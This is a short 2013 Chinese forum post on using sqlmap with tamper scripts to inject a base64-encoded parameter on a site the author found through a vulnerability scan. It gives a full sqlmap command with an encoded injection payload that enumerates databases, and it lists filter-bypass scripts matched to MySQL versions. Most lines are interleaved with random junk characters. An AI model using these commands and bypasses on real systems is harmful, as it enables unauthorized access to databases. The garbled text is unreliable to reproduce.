找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2221|回复: 0
打印 上一主题 下一主题

SQlMap Tamper注入Base64编码注入点

[复制链接]
跳转到指定楼层
楼主
发表于 2013-11-23 15:50:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?3 R; x5 _; f" H( y$ [3 |

! r& N* Q4 |; bsqlmap的tamper里有个base64encode.py' m. Q) A2 c3 i. {: P
% u, N$ j/ z7 b- f0 B2 i; p$ u) q: ?
使用如下
: B) J; e7 y4 G) y& f1 @- X, m
, j) K0 C, C% Q3 J* psqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
, Z2 u7 s$ g& i# h. @9 m9 ?; ~, B! v* K; p$ z
: d2 S( \' _1 y6 K, w% V
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”. }% f0 ~+ |" z
* \9 N# c" A/ K' S0 x  o
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:0 p+ l; o* s$ [6 M* {, ]1 U

! M* f$ `* @! T+ xspace2hash.py ,对于MYSQL数据库 4.0, 5.0注入
8 K/ a: J% a' Z0 @# ^" G' Wspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入4 Q3 [! a2 h4 E
首先确定目标数据库版本,然后选择相应的脚本。
8 N  H+ z' h) q% X* B-v 3 --batch --tamper "space2hash.py"
6 E" t- [) L+ U& N( |
. F' e# e0 A% Y( W还有其他一些插件:. F- o0 b6 K/ h7 t& ~
encodes编码 ——charencode.py+ f4 u$ n' `9 A. c$ J5 N7 Y
base64编码 —— base64encode.py. R, ~9 G& ]% Q4 g. Z& p  }
替换空格和关键字 —— halfversionedmorekeywords.py
/ S% \9 b* C8 l$ d% x

  }; Z: `8 l8 u, I& ]" Q9 J: K# _( V
: k6 R, D3 _* P9 f  d( C6 K
! O4 r: a5 h8 L& X& y
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表